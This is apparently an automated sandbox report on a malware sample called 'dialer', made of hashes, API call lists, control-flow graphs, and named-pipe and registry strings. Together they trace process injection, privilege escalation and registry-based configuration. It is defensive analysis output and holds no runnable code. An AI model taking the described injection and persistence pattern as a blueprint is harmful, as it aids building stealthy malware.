                                                                                                                            • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                                                            • Instruction Fuzzy Hash: 22116F36A08653CBE718DF16A85442EB661FF86B80F14403CDA4A97758DE7DE849CF60

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                                                            • String ID: .text$C:\Windows\System32\
                                                                                                                            • API String ID: 2721474350-832442975
                                                                                                                            • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                                                            • Instruction ID: b1aad000824aaf5dd49b90e7f9b27ddb2b2cadee0a52165e92be6697c0fb9a99
                                                                                                                            • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                                                            • Instruction Fuzzy Hash: AB519226A08682D7EB119F16E45476AB361FF86B94F444139DE4E83B58EF3CE94CCB10

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                                            • String ID: M$\\.\pipe\dialerchildproc64
                                                                                                                            • API String ID: 2203880229-3489460547
                                                                                                                            • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                                                                                            • Instruction ID: 70c36bce4784513eabde3c06528372354b36649fdf0439df4b2cb0fddd0ed4b6
                                                                                                                            • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                                                                                            • Instruction Fuzzy Hash: 6A111F25A58646D3F614DB21E8043B9E760BF867A0F044239D96AC36D4EF7CE94CCB20

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                                                            • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                                                            • API String ID: 2071455217-3440882674
                                                                                                                            • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                                                                                            • Instruction ID: 8362e39e7d25f46ce84185a2f8b954e5779d490f8de904119c318f230955b80f
                                                                                                                            • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                                                                                            • Instruction Fuzzy Hash: 20010025A48542D3F6549B21E844279E360BF57BE0F54423CDA6AC26E4EF7CE84CCB20

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(?,00000000,?,00007FF68D3D238B,?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D1801
                                                                                                                            • HeapAlloc.KERNEL32(?,00000000,?,00007FF68D3D238B,?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D1812
                                                                                                                              • Part of subcall function 00007FF68D3D14D8: GetProcessHeap.KERNEL32 ref: 00007FF68D3D150B
                                                                                                                              • Part of subcall function 00007FF68D3D14D8: HeapAlloc.KERNEL32 ref: 00007FF68D3D151E
                                                                                                                              • Part of subcall function 00007FF68D3D14D8: GetProcessHeap.KERNEL32 ref: 00007FF68D3D152C
                                                                                                                              • Part of subcall function 00007FF68D3D14D8: HeapAlloc.KERNEL32 ref: 00007FF68D3D153D
                                                                                                                              • Part of subcall function 00007FF68D3D14D8: K32EnumProcesses.KERNEL32 ref: 00007FF68D3D1557
                                                                                                                              • Part of subcall function 00007FF68D3D14D8: OpenProcess.KERNEL32 ref: 00007FF68D3D1585
                                                                                                                              • Part of subcall function 00007FF68D3D14D8: K32EnumProcessModules.KERNEL32 ref: 00007FF68D3D15AA
                                                                                                                              • Part of subcall function 00007FF68D3D14D8: ReadProcessMemory.KERNELBASE ref: 00007FF68D3D15E1
                                                                                                                              • Part of subcall function 00007FF68D3D14D8: CloseHandle.KERNELBASE ref: 00007FF68D3D161D
                                                                                                                              • Part of subcall function 00007FF68D3D14D8: GetProcessHeap.KERNEL32 ref: 00007FF68D3D162F
                                                                                                                              • Part of subcall function 00007FF68D3D14D8: HeapFree.KERNEL32 ref: 00007FF68D3D163D
                                                                                                                              • Part of subcall function 00007FF68D3D14D8: GetProcessHeap.KERNEL32 ref: 00007FF68D3D1643
                                                                                                                              • Part of subcall function 00007FF68D3D14D8: HeapFree.KERNEL32 ref: 00007FF68D3D1651
                                                                                                                            • OpenProcess.KERNEL32 ref: 00007FF68D3D1859
                                                                                                                            • TerminateProcess.KERNEL32 ref: 00007FF68D3D186C
                                                                                                                            • CloseHandle.KERNEL32 ref: 00007FF68D3D1875
                                                                                                                            • GetProcessHeap.KERNEL32 ref: 00007FF68D3D1885
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1323846700-0
                                                                                                                            • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                                                            • Instruction ID: 6aa203e5a905bfb3da0ee92d99c4b9561fb988c31448927f9520bb5083f331f1
                                                                                                                            • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                                                            • Instruction Fuzzy Hash: B8113022F09643C7FB15DB26A844069A7A1BF8BB84B18403CDA0DC3755EE3CD849CB10

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseHandleOpenWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 10462204-0
                                                                                                                            • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                                                            • Instruction ID: 0dd8c0ba2115ebc41de1b510431011f99bb72194d0ea0b7162bd496fb6fe1d45
                                                                                                                            • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                                                            • Instruction Fuzzy Hash: 53F01D21B0978293EB559F16A584129A661FF8ABC0F54903DEA8DC3758EF3DD889CB10

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00007FF68D3D226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D228F
                                                                                                                              • Part of subcall function 00007FF68D3D226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D229F
                                                                                                                              • Part of subcall function 00007FF68D3D226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D22B9
                                                                                                                              • Part of subcall function 00007FF68D3D226C: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF68D3D22D0
                                                                                                                              • Part of subcall function 00007FF68D3D226C: AdjustTokenPrivileges.KERNELBASE ref: 00007FF68D3D2308
                                                                                                                              • Part of subcall function 00007FF68D3D226C: GetLastError.KERNEL32 ref: 00007FF68D3D2312
                                                                                                                              • Part of subcall function 00007FF68D3D226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D231B
                                                                                                                              • Part of subcall function 00007FF68D3D226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D232F
                                                                                                                              • Part of subcall function 00007FF68D3D226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D2346
                                                                                                                              • Part of subcall function 00007FF68D3D226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D235F
                                                                                                                              • Part of subcall function 00007FF68D3D226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D2371
                                                                                                                              • Part of subcall function 00007FF68D3D226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D237E
                                                                                                                              • Part of subcall function 00007FF68D3D226C: RegCreateKeyExW.KERNELBASE ref: 00007FF68D3D23BE
                                                                                                                              • Part of subcall function 00007FF68D3D226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF68D3D23E5
                                                                                                                              • Part of subcall function 00007FF68D3D226C: RegSetKeySecurity.KERNELBASE ref: 00007FF68D3D23FE
                                                                                                                              • Part of subcall function 00007FF68D3D226C: LocalFree.KERNEL32 ref: 00007FF68D3D2408
                                                                                                                            • ExitProcess.KERNEL32 ref: 00007FF68D3D2263
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3836936051-0
                                                                                                                            • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                                                            • Instruction ID: 694a3a89772a88086bb854457f8485e67a0d695976de4f583de969f620a5c7d4
                                                                                                                            • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                                                            • Instruction Fuzzy Hash: F2A00115E5A543C7FA4837B5985A06CA1617F96A42F900438E00AD6296ED2C685ACA35

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 184 7ff68d3d2560-7ff68d3d258c 185 7ff68d3d2592 184->185 186 7ff68d3d273a-7ff68d3d2742 184->186 189 7ff68d3d26c6-7ff68d3d26fe GetProcessHeap HeapAlloc K32EnumProcesses 185->189 190 7ff68d3d2598-7ff68d3d259f 185->190 187 7ff68d3d297e-7ff68d3d29a2 ReadFile 186->187 188 7ff68d3d2748-7ff68d3d274b 186->188 193 7ff68d3d2a74-7ff68d3d2a8e 187->193 194 7ff68d3d29a8-7ff68d3d29af 187->194 191 7ff68d3d2974-7ff68d3d2979 call 7ff68d3d175c 188->191 192 7ff68d3d2751-7ff68d3d2756 188->192 189->193 195 7ff68d3d2704-7ff68d3d2715 189->195 196 7ff68d3d25a5-7ff68d3d25a8 190->196 197 7ff68d3d26bd-7ff68d3d26bf ExitProcess 190->197 191->193 199 7ff68d3d275c-7ff68d3d275f 192->199 200 7ff68d3d2919-7ff68d3d292c call 7ff68d3d1944 192->200 194->193 201 7ff68d3d29b5-7ff68d3d29c9 call 7ff68d3d18ac 194->201 195->193 202 7ff68d3d271b-7ff68d3d2733 call 7ff68d3d10c0 195->202 203 7ff68d3d25ae-7ff68d3d25b1 196->203 204 7ff68d3d2660-7ff68d3d268b RegOpenKeyExW 196->204 208 7ff68d3d2761-7ff68d3d2766 199->208 209 7ff68d3d279d-7ff68d3d27ae call 7ff68d3d1944 199->209 200->193 228 7ff68d3d2932-7ff68d3d2941 call 7ff68d3d1944 200->228 201->193 226 7ff68d3d29cf-7ff68d3d29d5 201->226 229 7ff68d3d2735 202->229 205 7ff68d3d2651-7ff68d3d265b 203->205 206 7ff68d3d25b7-7ff68d3d25ba 203->206 213 7ff68d3d26a1-7ff68d3d26b8 call 7ff68d3d19c4 call 7ff68d3d175c call 7ff68d3d1000 call 7ff68d3d17ec 204->213 214 7ff68d3d268d-7ff68d3d269b RegDeleteValueW 204->214 205->193 215 7ff68d3d2644-7ff68d3d264c 206->215 216 7ff68d3d25c0-7ff68d3d25c5 206->216 208->193 218 7ff68d3d276c-7ff68d3d2796 call 7ff68d3d217c call 7ff68d3d21a8 ExitProcess 208->218 209->193 235 7ff68d3d27b4-7ff68d3d27d6 ReadFile 209->235 213->193 214->213 215->193 216->193 223 7ff68d3d25cb-7ff68d3d25ef ReadFile 216->223 223->193 230 7ff68d3d25f5-7ff68d3d25fc 223->230 233 7ff68d3d2a5f 226->233 234 7ff68d3d29db-7ff68d3d2a16 GetProcessHeap HeapAlloc call 7ff68d3d14d8 226->234 228->193 244 7ff68d3d2947-7ff68d3d296f ShellExecuteW 228->244 229->193 230->193 238 7ff68d3d2602-7ff68d3d2616 call 7ff68d3d18ac 230->238 241 7ff68d3d2a66-7ff68d3d2a6f call 7ff68d3d2a90 233->241 255 7ff68d3d2a18-7ff68d3d2a1e 234->255 256 7ff68d3d2a49-7ff68d3d2a4f GetProcessHeap 234->256 235->193 243 7ff68d3d27dc-7ff68d3d27e3 235->243 238->193 259 7ff68d3d261c-7ff68d3d2622 238->259 241->193 243->193 250 7ff68d3d27e9-7ff68d3d2827 GetProcessHeap HeapAlloc ReadFile 243->250 244->193 251 7ff68d3d290b-7ff68d3d2914 GetProcessHeap 250->251 252 7ff68d3d282d-7ff68d3d2839 250->252 258 7ff68d3d2a52-7ff68d3d2a5d HeapFree 251->258 252->251 257 7ff68d3d283f-7ff68d3d284b 252->257 255->256 261 7ff68d3d2a20-7ff68d3d2a32 255->261 256->258 257->251 264 7ff68d3d2851-7ff68d3d285c 257->264 258->193 265 7ff68d3d2624-7ff68d3d2633 call 7ff68d3d10c0 259->265 266 7ff68d3d2638-7ff68d3d263f 259->266 262 7ff68d3d2a34-7ff68d3d2a36 261->262 263 7ff68d3d2a38-7ff68d3d2a40 261->263 262->263 268 7ff68d3d2a44 call 7ff68d3d16cc 262->268 263->256 269 7ff68d3d2a42 263->269 270 7ff68d3d285e-7ff68d3d2869 264->270 271 7ff68d3d2881-7ff68d3d2905 lstrlenW GetProcessHeap HeapAlloc call 7ff68d3d2a90 GetProcessHeap HeapFree 264->271 265->193 266->241 268->256 269->261 270->251 274 7ff68d3d286f-7ff68d3d287c call 7ff68d3d1c88 270->274 271->251 274->251
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                                                                            • String ID: SOFTWARE$dialerstager$open
                                                                                                                            • API String ID: 3276259517-3931493855
                                                                                                                            • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                                                            • Instruction ID: 2be691aec108783c2fe5dabd0e32732c6119e52f4228ab01b627362ea6b00014
                                                                                                                            • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                                                            • Instruction Fuzzy Hash: 9ED19425A48683DBE7799F2598002B9A365FF46784F400139D94ED7699EE3CEA0CCB60

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 3462610200-2766056989
                                                                                                                            • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                                                            • Instruction ID: 6c926fccff7bb55736e55ddd7b36ea6b261fd78a0b62a41cdb0396561d682473
                                                                                                                            • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                                                            • Instruction Fuzzy Hash: CC518E32B04A41CBE7518B22E84066EB7A1FF4AB88F054139DE4DD3758EF38D849CB50

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                            • String ID: dialersvc64
                                                                                                                            • API String ID: 4184240511-3881820561
                                                                                                                            • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                                                            • Instruction ID: 70f641ffef37103d224b8fba2758a0f682d29706ecb33dce003b548a188f7874
                                                                                                                            • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                                                            • Instruction Fuzzy Hash: 52414032B04A42D7E710CF65E4442ADB3B5FF89B89F045139EE4D86A58EF38E549C710
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Delete$CloseEnumOpen
                                                                                                                            • String ID: SOFTWARE\dialerconfig
                                                                                                                            • API String ID: 3013565938-461861421
                                                                                                                            • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                                                            • Instruction ID: e22bf671f53574c17207d2ce685d13f5af4e97122075bc82acb07468f876a556
                                                                                                                            • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                                                            • Instruction Fuzzy Hash: 9D119122A18A85C3F7608B25E8457BDA364FF49794F404239D64DCAA98EF3CD64CCF24
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Write$CloseCreateHandle
                                                                                                                            • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                                                            • API String ID: 148219782-3440882674
                                                                                                                            • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                                                            • Instruction ID: f318cddbec6521c439162f064f148c1db0b94ae48ad75189058c53694bf3e3e3
                                                                                                                            • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                                                            • Instruction Fuzzy Hash: 19115E76A24B5183F7018F11E408329A760FF8AFA4F444239DA1A83B94DFBCD949CB50
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: ntdll.dll
                                                                                                                            • API String ID: 1646373207-2227199552
                                                                                                                            • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                                                            • Instruction ID: 051590e4f9f25e211291b39134c02d20ccb3c424847be2004d8f7904c2a764c6
                                                                                                                            • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                                                            • Instruction Fuzzy Hash: 07D0C754F15507C3FE195B62685417892917F5B745F444034CD1EC5350FE2CD59DCA20

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:1.3%
                                                                                                                            Dynamic/Decrypted Code Coverage:94.4%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:107
                                                                                                                            Total number of Limit Nodes:16
                                                                                                                            execution_graph 22368 2d0165e1abc 22373 2d0165e1628 GetProcessHeap 22368->22373 22370 2d0165e1ad2 Sleep SleepEx 22371 2d0165e1acb 22370->22371 22371->22370 22372 2d0165e1598 StrCmpIW StrCmpW 22371->22372 22372->22371 22374 2d0165e1648 _invalid_parameter_noinfo 22373->22374 22418 2d0165e1268 GetProcessHeap 22374->22418 22376 2d0165e1650 22377 2d0165e1268 2 API calls 22376->22377 22378 2d0165e1661 22377->22378 22379 2d0165e1268 2 API calls 22378->22379 22380 2d0165e166a 22379->22380 22381 2d0165e1268 2 API calls 22380->22381 22382 2d0165e1673 22381->22382 22383 2d0165e168e RegOpenKeyExW 22382->22383 22384 2d0165e18a6 22383->22384 22385 2d0165e16c0 RegOpenKeyExW 22383->22385 22384->22371 22386 2d0165e16ff RegOpenKeyExW 22385->22386 22387 2d0165e16e9 22385->22387 22389 2d0165e173a RegOpenKeyExW 22386->22389 22390 2d0165e1723 22386->22390 22429 2d0165e12bc 13 API calls _invalid_parameter_noinfo 22387->22429 22393 2d0165e175e 22389->22393 22394 2d0165e1775 RegOpenKeyExW 22389->22394 22422 2d0165e104c RegQueryInfoKeyW 22390->22422 22391 2d0165e16f5 RegCloseKey 22391->22386 22430 2d0165e12bc 13 API calls _invalid_parameter_noinfo 22393->22430 22396 2d0165e1799 22394->22396 22397 2d0165e17b0 RegOpenKeyExW 22394->22397 22431 2d0165e12bc 13 API calls _invalid_parameter_noinfo 22396->22431 22401 2d0165e17eb RegOpenKeyExW 22397->22401 22402 2d0165e17d4 22397->22402 22399 2d0165e176b RegCloseKey 22399->22394 22405 2d0165e180f 22401->22405 22406 2d0165e1826 RegOpenKeyExW 22401->22406 22432 2d0165e12bc 13 API calls _invalid_parameter_noinfo 22402->22432 22403 2d0165e17a6 RegCloseKey 22403->22397 22408 2d0165e104c 5 API calls 22405->22408 22409 2d0165e184a 22406->22409 22410 2d0165e1861 RegOpenKeyExW 